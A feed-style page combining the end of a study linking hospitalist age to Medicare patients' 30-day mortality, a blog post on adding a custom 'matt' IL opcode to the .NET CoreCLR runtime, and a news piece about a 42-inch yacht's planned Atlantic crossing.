grouping of patients within hospitals, adjusting for patient and physician characteristics and hospital fixed effects.34 Ninth, to focus on more homogenous patient populations, we separately analyzed the four most common conditions treated by hospitalists in our data (sepsis, pneumonia, congestive heart failure, and chronic obstructive pulmonary disease) (see table A in the appendix for diagnosis codes). Tenth, we used years since completion of residency, instead of physician age, as a measure of physician experience. We did not use this variable for our primary analyses because data on year of residency completion were missing for 35.5% of physicians, and we were concerned that missingness might not be at random. Eleventh, we conducted a formal sensitivity analysis to assess the extent to which an unmeasured confounder might explain our results.35 Twelfth, we conducted cost analysis using different model specifications: a GLM model with a log link and a negative binomial distribution, a GLM model with a log link and a Poisson distribution, and an ordinary least squares model after winsorizing the top 1% of observations with largest residuals (replacing outlier costs by the most extreme retained values). Finally, we conducted analyses among subgroups including Medicare beneficiaries aged ≥65 who were admitted to hospital with an emergency medical condition (as opposed to our baseline analysis of “non-elective” conditions, which included both emergency and urgent admissions), Medicare beneficiaries aged ≥65 who were admitted with an elective medical condition, and Medicare beneficiaries aged 20-64. The latter group qualified for Medicare through disability and has generally worse health status than the general US population aged below 65, but nonetheless the generalizability of our findings to populations of younger patients is of interest.

Data preparation was conducted with SAS, version 9.4 (SAS Institute), and analyses were performed with Stata, version 14 (Stata-Corp, College Station, TX).

Patient involvement

No patients were involved in setting the research question or the outcome measures, nor were they involved in developing plans for the design or implementation of the study. No patients were asked to advise on interpretation or writing up of results. There are no plans to disseminate the results of the research to study participants or the relevant patient community. Patient consent was not required for the study.

Results

Physician and patient characteristics

The median and mean age among 18 854 hospitalist physicians in our sample in 2014 was 41.0 and 42.9, respectively. A broad range of patient characteristics, including the number of Elixhauser comorbidities and composite Elixhauser comorbidity scores,36 were balanced across physicians with different ages (table 1⇓).

Table 1

Study population of Medicare beneficiaries treated in hospital in 2011-14 by age of treating physician. Figures are percentage unless otherwise specified

Physician age and patient mortality

The overall 30 day mortality rate in our final sample of 736 537 hospital admissions was 11.1%. Figure 1⇓ shows the results of a logistic regression model with linear splines. After adjustment for patient and physician characteristics and hospital fixed effects, older physicians had significantly higher patient mortality than younger physicians. We could reject the null of linearity (P=0.02, fig 1⇓). Because we observed a non-linear relation between physician age and patient mortality, we also fitted a linear spline logistic model allowing for different slopes for physicians aged <60 and aged ≥60 and found that an additional 10 years increase in physician age was associated with an adjusted odds ratio of 30 day mortality of 1.03 (95% confidence interval 1.02 to 1.05; P<0.001) for physicians aged <60, and 1.22 (1.08 to 1.37; P=0.01) for physicians aged ≥60 (table 2⇓). When age was modeled as a continuous linear variable, an additional 10 year increase in physician age was associated with an adjusted odds ratio of 30 day mortality of 1.04 (1.03 to 1.06; P<0.001), interpreted as the average odds ratio across all physician age groups (table 2⇓).

Fig 1 Adjusted association between physician age and patient mortality with linear spline model. Multivariable logistic regression model with linear splines was used with knots placed at physician age of 40, 50, and 60, adjusted for patient and physician characteristics and hospital fixed effects. Solid line represents point estimates, and shaded area represents 95% CI around these estimates

Table 2

Association between physician age and 30 day patient mortality in patients admitted to hospital. Table includes results of three analyses: modeling age as a continuous variable, modeling age as a continuous variable with separate splines at ages <60 and ≥60, and modeling age as categorical variable. All models adjusted for patient and physician characteristics and hospital fixed effects. Standard errors were clustered at physician level. Estimates should be interpreted as average odds ratio across all physician age categories

Treating physician age as a categorical variable showed a monotonic relation between physician age and patient mortality. Physicians aged <40 had the lowest patient mortality rate (adjusted 30 day mortality rate 10.8%, 95% confidence interval 10.7% to 10.9%), followed by physicians aged 40-49 (11.1%, 11.0% to 11.3%), 50-59 (11.3%, 11.1% to 11.5%), and ≥60 (12.1%, 11.6% to 12.5%) (table 2⇑).

Physician age and patient mortality by volume

Physician age was positively associated with patient mortality among physicians with low and medium volumes of patients but not among those with high volumes of patients (table 3⇓), who also had the lowest overall mortality rate. For instance, each 10 year increase in physician age was associated with adjusted odds ratios of 30 day mortality of 1.19 (95% confidence interval 1.14 to 1.23; P<0.001) and 1.06 (1.03 to 1.09; P<0.001) among low and medium volume physicians, respectively. In contrast, despite the larger sample size among high volume physicians, we observed no association between physician age and patient mortality (adjusted odds ratio for additional 10 years, 1.01, 0.99 to 1.03; P=0.29). The interaction between physician age and patient volume was significant (P<0.001).

Table 3

Physician age and 30 day patient mortality in patients admitted to hospital, stratified by patient volume

Patient readmissions and part B spending

We found no association between physician age and the patient 30 day readmission rate (adjusted odds ratio for additional 10 years, 1.00, 95% confidence interval 0.99 to 1.01; P=0.82) (table 4⇓). Although differences in part B spending between physicians of varying age were significant, they were small. Each 10 year increase in physician age was associated with a 2.4% increase (2.0% to 2.8%; P<0.001) in part B spending.

Table 4

Association between physician age, 30 day readmission rate, and costs of care in patients admitted to hospital

Secondary analyses

Our overall findings were qualitatively unaffected by including non-hospitalist general internists, although the observed relation between patient mortality and physician age was smaller (table B in appendix). The smaller relation between physician age and patient outcomes might be because of unobserved differences in severity of illness between patients treated by young versus old physicians or actual differences in how physician age relates to patient mortality among hospitalists versus non-hospitalist general internists. Our findings were also not sensitive to using alternative methods for attributing physicians (table C in appendix); excluding patients with cancer or discharged to hospice (table D in appendix); restricting analysis to patients aged 65-75 (table E in appendix); including hospitalists with medical subspecialty boards (table F in appendix); restricting to the first admission for patients with multiple admissions (table G in appendix); using in hospital, 60 day, and 90 day mortality rates instead of 30 day mortality (tables H and I in appendix); and the use of GEE instead of cluster robust standard errors (table J in appendix). When we stratified by primary diagnosis, older hospitalists had higher patient mortality for sepsis, congestive heart failure, and chronic obstructive pulmonary disease, but not for pneumonia (table K in appendix). When using years in practice instead of age we found similar results (table L in appendix). A formal test for an unmeasured confounder showed that it is unlikely that this could explain the observed association between physician age and patient mortality (table M in appendix). Use of different model specifications for cost analyses did not qualitatively affect our findings (table N in appendix). Finally, we observed similar relations between physician age and 30 day patient mortality in subgroup analyses of Medicare beneficiaries aged ≥65 who were admitted with an emergency medical condition, Medicare beneficiaries aged ≥65 who were admitted with an elective medical condition, and admitted Medicare beneficiaries aged 20-64 (tables O and P in appendix).

Discussion

Principal findings

In a national sample of elderly Medicare beneficiaries admitted to hospital with medical conditions, we found that patients treated by older physicians had higher 30 day mortality than those cared for by younger physicians, despite similar patient characteristics. These associations were found among physicians with low and medium volumes of patients but not among those with high volumes. Readmission rates and costs of care did not meaningfully vary with physician age. Taken together, our findings suggest that differences in practice patterns or process measures of quality between physicians with varying years of experience reported in previous studies1 2 3 4 37 might have a meaningful impact on patient outcomes.

Mechanisms that could explain our current findings can be broadly categorized into effects of age (“age effects”) versus effects arising from differences in how younger and older physicians trained (“cohort effects”). It is possible that physicians further from training are less likely to adhere to evidence based guidelines, might use newly proved treatments less often, and might more often rely on clinical evidence that is not up to date.38 Moreover, while intense exposure to a large number of patients during residency training might enable physicians shortly out of such training to provide high quality care, the benefits of this training experience could wane if physicians care for fewer inpatients after residency. The lack of association between physician age and patient mortality among physicians with higher volume of patients supports this age related hypothesis.

Our findings might just as likely reflect cohort effects rather than declining clinical performance associated with greater age, which has important implications for interpretation of our findings. Hospital medicine is among the most rapidly evolving specialties within medicine, with dramatic changes in the training of recent cohorts of physicians who now work as hospitalists, including greater emphasis on multi-professional team based practice, adherence to clinical guidelines, training on patient handoffs, familiarity with shift work during residency training, and an improved hospital safety culture. Because the specialty of hospital medicine was first recognized in the 1990s, our study might have compared younger physicians who began their careers as hospitalists with older physicians who began their careers as primary care physicians and later became hospitalists. Thus, cohort differences in physician training, as well as declines in skill with aging, could explain our findings. Under this hypothesis, the cohort of physicians entering hospital medicine today might experience no reduction in patient outcomes with aging or possibly improved outcomes. Nonetheless, from the perspective of policymakers and administrators, current outcomes of older versus younger hospitalists might still be important to know irrespective of the path by which younger versus older physicians entered the specialty.

Our findings suggest that within the same hospital, patients treated by physicians aged <40 have 0.85 times the odds of dying (1.00/1.17) or an 11% lower probability of dying (10.8/12.1), compared with patients cared for by physicians aged ≥60 (table 2⇑). This difference in mortality is comparable with the impact of statins for the primary prevention of cardiovascular mortality on all cause mortality (odds ratio of 0.86)39 or the impact of β blockers on mortality among patients with myocardial infarction (incidence rate ratio of 0.86),40 indicating that our observed difference in mortality is not only statistically significant but arguably clinically significant. In addition, if our results are causal, an adjusted risk difference of 1.3 percentage points suggests that for every 77 patients treated by doctors aged ≥60, one fewer patient would die within 30 days of admission if those patients were cared for by physicians aged <40.

Policy implications

Our findings should be regarded as exploratory. Nonetheless, they highlight the importance of patient outcomes as one component of an assessment of how physician practices change over a career. The purpose of continuing medical education is to ensure that physicians provide high quality care over the course of their careers. Although continuing medical education can take multiple forms that vary across specialties and across countries, the issue of ensuring that physicians keep up with current standards of care is applicable across all specialties and countries. In the US, for example, there are ongoing debates about the requirements for maintenance of certification, with many physicians arguing that current requirements could be burdensome and unneeded. Although our study did not analyze the effects of current such policies in the US, it suggests that continuing medical education of physicians could be important and that continual assessment of outcomes might be useful. In addition, although quality of care initiatives have largely focused on system level measures (such as hospital 30 day mortality and readmissions), there is increasing policy emphasis on the role of individual physicians in influencing costs and quality of care.41 42 43 For example, in the US, the Centers for Medicare and Medicaid Services has just promulgated draft final regulations for a new approach to pay individual clinicians for the value and quality of care they provide under the Medicare Access and CHIP Reauthorization Act (MACRA).44

Strengths and limitations of study

Our study has several limitations. First, our findings would be confounded if older physicians, on average, treat patients at higher risk of 30 day mortality because of factors unmeasured by our analysis. We specifically chose our within hospital study design to deal with this concern, hypothesizing that patients are essentially randomized to hospitalist physicians of various ages within the same hospital, an assumption supported by the largely similar demographic and clinical characteristics across patients that older and younger physicians treat. Second, we found that the positive association between physician age and patient mortality was driven primarily by physicians treating a low to medium volumes of patients, suggesting that high volumes could be “protective” of clinical skills. The association between practice volume and skills, however, could be bidirectional—physicians whose skills are declining might either self select, or be encouraged by others to leave, positions in which they are responsible for clinical management of large numbers of patients and could, therefore, treat fewer patients over time. Nonetheless, it is still important to know that older physicians with low and medium volumes of patients have worse patient outcomes because this information could suggest that specific interventions could be targeted towards these physicians. Third, the cross sectional nature of our study did not allow us to distinguish the degree to which our findings were attributable to declines in clinical performance with physician age versus cohort effects associated with secular changes in training. In the latter case, although older physicians could now be associated with higher patient mortality, as the current cohort of younger hospitalists age they might retain their superior patient outcomes even without individual maintenance of certification-type interventions. Fourth, physician age is only one of several factors associated with physician performance; physicians of varying skill level can be found within every age category. Finally, our findings might not generalize to the non-Medicare population, to patients cared for by surgeons or other specialists, or to physicians practicing in other countries (particularly as rates of hospitalist use might differ across countries). Further studies are warranted to understand whether similar patterns are observed in these other settings.

Conclusions

Patients in hospital treated by older hospitalists have higher mortality than patients cared for by younger hospitalists, except for hospitalist physicians with high volumes of patients. We found similar associations among patients treated by general internists. Readmission rates and costs of care did not meaningfully vary with physician age.

What is already known on this topic

Whether quality of care differs between younger and older physicians remains largely unknown
Though clinical skills and knowledge accumulated by more experienced physicians could lead to improved quality of care, physicians’ skills might become outdated as scientific knowledge, technology, and clinical guidelines change
Older physicians might have decreased clinical knowledge, adhere less often to standards of appropriate treatment, and perform worse on process measures of quality with respect to diagnosis, screening, and preventive care

What this study adds

This study examined patient outcomes, including 30 day mortality, readmissions, and costs of care, in a nationally representative sample of US Medicare beneficiaries admitted to hospital with a medical condition in 2011-14
Patients were treated by hospitalists (physicians whose clinical focus is caring of patients in hospital), to whom they are typically assigned based on scheduled work shifts
Within the same hospital, patients treated by older hospitalists had similar characteristics to patients treated by younger hospitalists but had higher mortality rates, with the exception of those hospitalists who treated high volumes of patients
Readmissions did not vary with physician age, while costs of care were slightly higher among older physicians

↧

Adding a new Bytecode instruction to the .NET runtime

May 19, 2017, 2:43 pm

≫ Next: 42-inch yacht still hoping to become the smallest boat to cross the Atlantic

≪ Previous: Hospital patients treated by older physicians are more likely to die

19 May 2017 - 2694 words

Now that the CoreCLR is open-source we can do fun things, for instance find out if it’s possible to add new IL (Intermediate Language) instruction to the runtime.

TL;DR it turns out that it’s easier than you might think!! Here are the steps you need to go through:

Step 0

But first a bit of background information. Adding a new IL instruction to the CLR is a pretty rare event, that last time is was done for real was in .NET 2.0 when support for generics was added. This is part of the reason why .NET code had good backwards-compatibility, from Backward compatibility and the .NET Framework 4.5:

The .NET Framework 4.5 and its point releases (4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7) are backward-compatible with apps that were built with earlier versions of the .NET Framework. In other words, apps and components built with previous versions will work without modification on the .NET Framework 4.5.

Side note: The .NET framework did break backwards compatibility when moving from 1.0 to 2.0, precisely so that support for generics could be added deep into the runtime, i.e. with support in the IL. Java took a different decision, I guess because it had been around longer, breaking backwards-comparability was a bigger issue. See the excellent blog post Comparing Java and C# Generics for more info.

Step 1

For this exercise I plan to add a new IL instruction (op-code) to the CoreCLR runtime and because I’m a raving narcissist (not really, see below) I’m going to name it after myself. So let me introduce the matt IL instruction, that you can use like so:

.method private hidebysig static int32 TestMattOpCodeMethod(int32 x, int32 y) 
        cil managed noinlining
{
    .maxstack 2
    ldarg.0
    ldarg.1
    matt  // yay, my name as an IL op-code!!!!
    ret
}

But because I’m actually a bit-British (i.e. I don’t like to ‘blow my own trumpet’), I’m going to make the matt op-code almost completely pointless, it’s going to do exactly the same thing as calling Math.Max(x, y), i.e. just return the largest of the 2 numbers.

The other reason for naming it matt is that I’d really like someone to make a version of the C# (Roslyn) compiler that allows you to write code like this:

Console.WriteLine("{0} m@ {1} = {2}",1,7,1m@7));// prints '1 m@ 7 = 7'

I definitely want the m@ operator to be a thing (pronounced ‘matt’, not ‘m-at’), maybe the other ‘Matt Warren’ who works at Microsoft on the C# Language Design Team can help out!! Seriously though, if anyone reading this would like to write a similar blog post, showing how you’d add the m@ operator to the Roslyn compiler, please let me know I’d love to read it.

Now we’ve defined the op-code, the first step is to ensure that the run-time and tooling can recognise it. In particular we need the IL Assembler (a.k.a ilasm) to be able to take the IL code above (TestMattOpCodeMethod(..)) and produce a .NET executable.

As the .NET runtime source code is nicely structured (+1 to the runtime devs), to make this possible we only need to makes changes in opcode.def:

--- a/src/inc/opcode.def+++ b/src/inc/opcode.def@@ -154,7 +154,7 @@ OPDEF(CEE_NEWOBJ,                     "newobj",           VarPop,             Pu OPDEF(CEE_CASTCLASS,                  "castclass",        PopRef,             PushRef,     InlineType,         IObjModel,   1,  0xFF,    0x74,    NEXT)
 OPDEF(CEE_ISINST,                     "isinst",           PopRef,             PushI,       InlineType,         IObjModel,   1,  0xFF,    0x75,    NEXT)
 OPDEF(CEE_CONV_R_UN,                  "conv.r.un",        Pop1,               PushR8,      InlineNone,         IPrimitive,  1,  0xFF,    0x76,    NEXT)-OPDEF(CEE_UNUSED58,                   "unused",           Pop0,               Push0,       InlineNone,         IPrimitive,  1,  0xFF,    0x77,    NEXT)+OPDEF(CEE_MATT,                       "matt",             Pop1+Pop1,          Push1,       InlineNone,         IPrimitive,  1,  0xFF,    0x77,    NEXT) OPDEF(CEE_UNUSED1,                    "unused",           Pop0,               Push0,       InlineNone,         IPrimitive,  1,  0xFF,    0x78,    NEXT)
 OPDEF(CEE_UNBOX,                      "unbox",            PopRef,             PushI,       InlineType,         IPrimitive,  1,  0xFF,    0x79,    NEXT)
 OPDEF(CEE_THROW,                      "throw",            PopRef,             Push0,       InlineNone,         IObjModel,   1,  0xFF,    0x7A,    THROW)

I just picked the first available unused slot and added matt in there. It’s defined as Pop1+Pop1 because it takes 2 values from the stack as input and Push1 because after is has executed, a single result is pushed back onto the stack.

Note: all the changes I made are available in one-place on GitHub if you’d rather look at them like that.

Once this chance was done ilasm will successfully assembly the test code file HelloWorld.il that contains TestMattOpCodeMethod(..) as shown above:

λ ilasm /EXE /OUTPUT=HelloWorld.exe -NOLOGO HelloWorld.il

Assembling 'HelloWorld.il'  to EXE --> 'HelloWorld.exe'
Source file is ANSI

Assembled method HelloWorld::Main
Assembled method HelloWorld::TestMattOpCodeMethod

Creating PE file

Emitting classes:
Class 1:        HelloWorld

Emitting fields and methods:
Global
Class 1 Methods: 2;
Resolving local member refs: 1 -> 1 defs, 0 refs, 0 unresolved

Emitting events and properties:
Global
Class 1
Resolving local member refs: 0 -> 0 defs, 0 refs, 0 unresolved
Writing PE file
Operation completed successfully

Step 2

However at this point the matt op-code isn’t actually executed, at runtime the CoreCLR just throws an exception because it doesn’t know what to do with it. As a first (simpler) step, I just wanted to make the .NET Interpreter work, so I made the following changes to wire it up:

--- a/src/vm/interpreter.cpp+++ b/src/vm/interpreter.cpp@@ -2726,6 +2726,9 @@ void Interpreter::ExecuteMethod(ARG_SLOT* retVal, __out bool* pDoJmpCall, __out         case CEE_REM_UN:
             BinaryIntOp<BIO_RemUn>();
             break;+        case CEE_MATT:
+            BinaryArithOp<BA_Matt>();
+            break;         case CEE_AND:
             BinaryIntOp<BIO_And>();
             break;--- a/src/vm/interpreter.hpp+++ b/src/vm/interpreter.hpp@@ -298,10 +298,14 @@ void Interpreter::BinaryArithOpWork(T val1, T val2)         {
             res = val1 / val2;
         }-        else +        else if (op == BA_Rem)         {
             res = RemFunc(val1, val2);
         }+        else if (op == BA_Matt)
+        {
+            res = MattFunc(val1, val2);
+        }     }

and then I added the methods that would actually implement the interpreted code:

--- a/src/vm/interpreter.cpp+++ b/src/vm/interpreter.cpp@@ -10801,6 +10804,26 @@ double Interpreter::RemFunc(double v1, double v2)     return fmod(v1, v2);
 }+INT32 Interpreter::MattFunc(INT32 v1, INT32 v2)
+{
+	return v1 > v2 ? v1 : v2;
+}
+
+INT64 Interpreter::MattFunc(INT64 v1, INT64 v2)
+{
+	return v1 > v2 ? v1 : v2;
+}
+
+float Interpreter::MattFunc(float v1, float v2)
+{
+	return v1 > v2 ? v1 : v2;
+}
+
+double Interpreter::MattFunc(double v1, double v2)
+{
+	return v1 > v2 ? v1 : v2;
+}

So fairly straight-forward and the bonus is that at this point the matt operator is fully operational, you can actually write IL using it and it will run (interpreted only).

Step 3

However not everyone wants to re-compile the CoreCLR just to enable the Interpreter, so I want to also make it work for real via the Just-in-Time (JIT) compiler.

The full changes to make this work were spread across multiple files, but were mostly housekeeping so I won’t include them all here, check-out the full diff if you’re interested. But the significant parts are below:

--- a/src/jit/importer.cpp+++ b/src/jit/importer.cpp@@ -11112,6 +11112,10 @@ void Compiler::impImportBlockCode(BasicBlock* block)                 oper = GT_UMOD;
                 goto MATH_MAYBE_CALL_NO_OVF;+            case CEE_MATT:
+                oper = GT_MATT;
+                goto MATH_MAYBE_CALL_NO_OVF;
+             MATH_MAYBE_CALL_NO_OVF:
                 ovfl = false;
             MATH_MAYBE_CALL_OVF:--- a/src/vm/jithelpers.cpp+++ b/src/vm/jithelpers.cpp@@ -341,6 +341,14 @@ HCIMPL2(UINT32, JIT_UMod, UINT32 dividend, UINT32 divisor) HCIMPLEND
 /*********************************************************************/+HCIMPL2(INT32, JIT_Matt, INT32 x, INT32 y)
+{
+    FCALL_CONTRACT;
+    return x > y ? x : y;
+}
+HCIMPLEND
+
+/*********************************************************************/ HCIMPL2_VV(INT64, JIT_LDiv, INT64 dividend, INT64 divisor)
 {
     FCALL_CONTRACT;

In summary, these changes mean that during the JIT’s ‘Morph phase’ the IL containing the matt op code is converted from:

fgMorphTree BB01, stmt 1 (before)
       [000004] ------------             ▌  return    int   
       [000002] ------------             │  ┌──▌  lclVar    int    V01 arg1        
       [000003] ------------             └──▌  m@        int   
       [000001] ------------                └──▌  lclVar    int    V00 arg0

into this:

fgMorphTree BB01, stmt 1 (after)
       [000004] --C--+------             ▌  return    int   
       [000003] --C--+------             └──▌  call help int    HELPER.CORINFO_HELP_MATT
       [000001] -----+------ arg0 in rcx    ├──▌  lclVar    int    V00 arg0         
       [000002] -----+------ arg1 in rdx    └──▌  lclVar    int    V01 arg1

Note the call to HELPER.CORINFO_HELP_MATT

When this is finally compiled into assembly code it ends up looking like so:

// Assembly listing for method HelloWorld:TestMattOpCodeMethod(int,int):int             // Emitting BLENDED_CODE for X64 CPU with AVX                                           // optimized code                                                                       // rsp based frame                                                                      // partially interruptible                                                              // Final local variable assignments                                                     //                                                                                      //  V00 arg0         [V00,T00] (  3,  3   )     int  ->  rcx                            //  V01 arg1         [V01,T01] (  3,  3   )     int  ->  rdx                            //  V02 OutArgs      [V02    ] (  1,  1   )  lclBlk (32) [rsp+0x00]                     //                                                                                      // Lcl frame size = 40                                    G_M9261_IG01:4883EC28subrsp,40G_M9261_IG02:E8976FEB5EcallCORINFO_HELP_MATT90nopG_M9261_IG03:4883C428addrsp,40C3ret

I’m not entirely sure why there is a nop instruction in there? But it works, which is the main thing!!

Step 4

In the CLR you can also dynamically emit code at runtime using the methods that sit under the ‘System.Reflection.Emit’ namespace, so the last task is to add the OpCodes.Matt field and have it emit the correct values for the matt op-code.

--- a/src/mscorlib/src/System/Reflection/Emit/OpCodes.cs+++ b/src/mscorlib/src/System/Reflection/Emit/OpCodes.cs@@ -139,6 +139,7 @@ internal enum OpCodeValues         Castclass = 0x74,
         Isinst = 0x75,
         Conv_R_Un = 0x76,+        Matt = 0x77,         Unbox = 0x79,
         Throw = 0x7a,
         Ldfld = 0x7b,@@ -1450,6 +1451,16 @@ private OpCodes()             (0 << OpCode.StackChangeShift)
         );+        public static readonly OpCode Matt = new OpCode(OpCodeValues.Matt,
+            ((int)OperandType.InlineNone) |
+            ((int)FlowControl.Next << OpCode.FlowControlShift) |
+            ((int)OpCodeType.Primitive << OpCode.OpCodeTypeShift) |
+            ((int)StackBehaviour.Pop1_pop1 << OpCode.StackBehaviourPopShift) |
+            ((int)StackBehaviour.Push1 << OpCode.StackBehaviourPushShift) |
+            (1 << OpCode.SizeShift) |
+            (-1 << OpCode.StackChangeShift)
+        );
+         public static readonly OpCode Unbox = new OpCode(OpCodeValues.Unbox,
             ((int)OperandType.InlineType) |
             ((int)FlowControl.Next << OpCode.FlowControlShift) |

This lets us write the code shown below, which emits, compiles and then executes the matt op-code:

DynamicMethodmethod=newDynamicMethod("TestMattOpCode",returnType:typeof(int),parameterTypes:new[]{typeof(int),typeof(int)},m:typeof(TestClass).Module);// Emit the ILvargenerator=method.GetILGenerator();generator.Emit(OpCodes.Ldarg_0);generator.Emit(OpCodes.Ldarg_1);generator.Emit(OpCodes.Matt);// Use the new 'matt' IL OpCodegenerator.Emit(OpCodes.Ret);// Compile the IL into a delegate (uses the JITter under-the-hood)varmattOpCodeInvoker=(Func<int,int,int>)method.CreateDelegate(typeof(Func<int,int,int>));// prints "1 m@ 7 = 7"Console.WriteLine("{0} m@ {1} = {2} (via IL Emit)",1,7,mattOpCodeInvoker(1,7));// prints "12 m@ 9 = 12"Console.WriteLine("{0} m@ {1} = {2} (via IL Emit)",12,9,mattOpCodeInvoker(12,9));

Step 5

Finally, you may have noticed that I cheated a little bit in Step 3 when I made changes to the JIT. Even though what I did works, it is not the most efficient way due to the extra method call to CORINFO_HELP_MATT. Also the JIT generally doesn’t use helper functions in this way, instead prefering to emit assembly code directly.

As a future exercise for anyone who has read this far (any takers?), it would be nice if the JIT emitted more efficient code. For instance if you write C# code like this (which does the same thing as the matt op-code):

privatestaticintMaxMethod(intx,inty){returnx>y?x:y;}

It’s turned into the following IL by the C# compiler

IL to import:
IL_0000  02                ldarg.0     
IL_0001  03                ldarg.1     
IL_0002  30 02             bgt.s        2 (IL_0006)
IL_0004  03                ldarg.1     
IL_0005  2a                ret         
IL_0006  02                ldarg.0     
IL_0007  2a                ret

Then when the JIT runs it’s processed as 3 basic-blocks (BB01, BB02 and BB03):

Importing BB01 (PC=000) of 'TestNamespace.TestClass:MaxMethod(int,int):int'
    [ 0]   0 (0x000) ldarg.0
    [ 1]   1 (0x001) ldarg.1
    [ 2]   2 (0x002) bgt.s
           [000005] ------------             ▌  stmtExpr  void  (IL 0x000...  ???)
           [000004] ------------             └──▌  jmpTrue   void  
           [000002] ------------                │  ┌──▌  lclVar    int    V01 arg1         
           [000003] ------------                └──▌  >         int   
           [000001] ------------                   └──▌  lclVar    int    V00 arg0         

Importing BB03 (PC=006) of 'TestNamespace.TestClass:MaxMethod(int,int):int'
    [ 0]   6 (0x006) ldarg.0
    [ 1]   7 (0x007) ret
           [000009] ------------             ▌  stmtExpr  void  (IL 0x006...  ???)
           [000008] ------------             └──▌  return    int   
           [000007] ------------                └──▌  lclVar    int    V00 arg0         

Importing BB02 (PC=004) of 'TestNamespace.TestClass:MaxMethod(int,int):int'
    [ 0]   4 (0x004) ldarg.1
    [ 1]   5 (0x005) ret
           [000013] ------------             ▌  stmtExpr  void  (IL 0x004...  ???)
           [000012] ------------             └──▌  return    int   
           [000011] ------------                └──▌  lclVar    int    V01 arg1

Before finally being turned into the following assembly code, which is way more efficient. It contains just a cmp, a jg and a couple of mov instructions, but crucially it’s all done in-line, it doesn’t need call out to another method.

// Assembly listing for method TestNamespace.TestClass:MaxMethod(int,int):int// Emitting BLENDED_CODE for X64 CPU with AVX// optimized code// rsp based frame// partially interruptible// Final local variable assignments////   V00 arg0         [V00,T00] (  4,  3.50)     int  ->  rcx//   V01 arg1         [V01,T01] (  4,  3.50)     int  ->  rdx// # V02 OutArgs      [V02    ] (  1,  1   )  lclBlk ( 0) [rsp+0x00]//// Lcl frame size = 0G_M32709_IG01:G_M32709_IG02:3BCAcmpecx,edx7F03jgSHORTG_M32709_IG048BC2moveax,edxG_M32709_IG03:C3retG_M32709_IG04:8BC1moveax,ecxG_M32709_IG05:C3ret

Disclaimer/Credit

I got the idea for doing this from the Appendix of the excellent book Shared Source CLI Essentials - Amazon, you can also download a copy of the 2nd edition if you don’t want to purchase the print one.

In Appendix B the authors of the book reproduced the work that Peter Drayton did to add an Exponentiation op-code to the SSCLI, which inspired this entire post, so thanks for that!!

Appendix B - Add a new CIL opcode.png

↧

42-inch yacht still hoping to become the smallest boat to cross the Atlantic

May 19, 2017, 2:29 pm

≫ Next: 44 engineering management lessons

≪ Previous: Adding a new Bytecode instruction to the .NET runtime

Matt Kent, age 33, turned back just 24 hours into his first attempt to sail across the Atlantic aboard the "stern-faced" tub Undaunted. Ryan Langley takes a close-up look at this tiny little ocean-crossing capsule.

Just 24 hours into his first attempt to sail solo across the Atlantic in Undaunted, his 42-inch yacht, Matt Kent had to turn back.

He set off from La Gomera in the Canary Islands on 6 April, but returned after concerns about his boat’s seaworthiness.

He explains: “I wasn’t really in too much danger, [but] there was a weak point in the boat that was concerning me. The emergency floatation system component that was on the rudder assembly was getting hammered so hard in these really close together waves. The float was getting jammed upwards so fast and so often the boat’s movement couldn’t keep up.

“It was the worst, most unpredictable and erratic conditions I have ever sailed in with that boat. When it started gusting 45 knots I decided that I shouldn’t keep going with such an obvious weak link.”

Kent estimated his crossing time at some three months, so Undaunted cannot be fixed in time to avoid the hurricane season this year. He therefore plans to postpone his next attempt until the autumn.

He still hopes to set a record for the smallest boat ever to cross the Atlantic. “Both of the guys that held this record had to wait months or even years as setbacks took their toll.”

Where it all began for Undaunted

Skipper Matt Kent was working on a 200ft tall ship when he pondered what the smallest boat ever to sail around the world had been. On discovering that a 5ft 4in yacht had crossed the Atlantic, a seed was sown which resulted in the custom-designed Undaunted.

In 1965 Robert Manry sailed his 13ft 6in Tinkerbelle from Massachusetts to England (see video clip below), and the modern ‘microyacht’ trend was born. Tinkerbelle was followed by the 12ft Nonoalca and 8ft Bathtub across the Atlantic.

By 1968 Hugo Vilhen had made the smallest ocean crossing yet, sailing his 6ft April Fool from Casablanca to Miami. Vilhen went on to cross the Atlantic in his 5ft 4in Father’s Day, while in 2002, Tom McNally attempted, but failed, to cross the Atlantic in the absurdly tiny 3ft 11in Vera Hugh II.

Now Matt Kent, a 33-year-old professional tall ship sailor originally from Oregon, is preparing to cross the Atlantic Ocean aboard his three-and-a-half foot aluminium microyacht Undaunted. He expects the 4,700 nautical mile voyage to Florida, to take four months.

“Undaunted is 42in long and 42in wide with a 5ft draught, 700lb lead ballast and a 40-gallon emergency water tank slung off the bottom of the keel,” explains Kent.

“Undaunted is designed to pitch rather than roll. That is counter to most boat designs. With better roll stability it will slip off the wind less as it leans forward. If it was more inclined to roll it would move forward and spill the wind from side to side, and be less efficient with more movement.

“Large twin rudders for low-speed efficiency and redundancy also help straighten the boat’s movement, along with a full keel.”

A test sail on Lake Erie demonstrated the unique handling of the boat Kent calls ‘a grumpy little man’.

“He sails downwind like a champ, self-tending downwind by sail angle alone due to the high mast being all the way forward. With a hull speed of just 2.5 knots he is not quick but he is stable and his square dimensions means he is affected by waves from any angle the same.

“He just bobs up and down. With a balance point about 16in above the keel and a 5ft draught he has a stability profile most designers would kill for.

“Undaunted is a terrible boat, but he is a great storm shelter. A sailing capsule ready for the worst and also able to do the easy part, sailing in a straight line.

“We couldn’t make it go any faster, we couldn’t make it longer for the record. So we focused on safety and stability and through that our stern-faced grumpy little man was born.”

The emergency flotation system can be inflated three times using onboard CO2 canisters, or hand-inflated. Kent has calculated that one tube can support the entire boat, while three can lift the hatch out of the sea even with the boat full of water.

Capsule living

“Sailing it is quite simple, living on it is harder,” Kent comments. He cannot lie fully flat on board. “The boat is designed around my dimensions.

“We have enough space for me to sit upright, and lay my neck and spine out to decompress on the diagonal. The hatch I stand up in is just above my hip bones to prevent me from getting flipped out of the boat, though I will have a harness and tether on all the time.”

The boat is painted white to reflect heat and fully insulated above the waterline, Kent explains. “Below the waterline was left bare so the conductive nature of the aluminium hull will create a cold pocket for me to be in. For ventilation my dorade is at the top of the mast along with my running lights, AIS antenna, and radar reflector.

“However, if I have to keep the hatch shut, I have a neoprene mask with two one-way valves in it. One breathes in from the cabin down the mast and the other breathes out into a flexible hose attached to the inner tube going back out of the mast.”

Provisions are stowed under Kent’s feet. “I have enough food – half freeze-dried – for six months at 1,500 calories a day. I have intentionally put on 20 extra pounds for the trip as well.

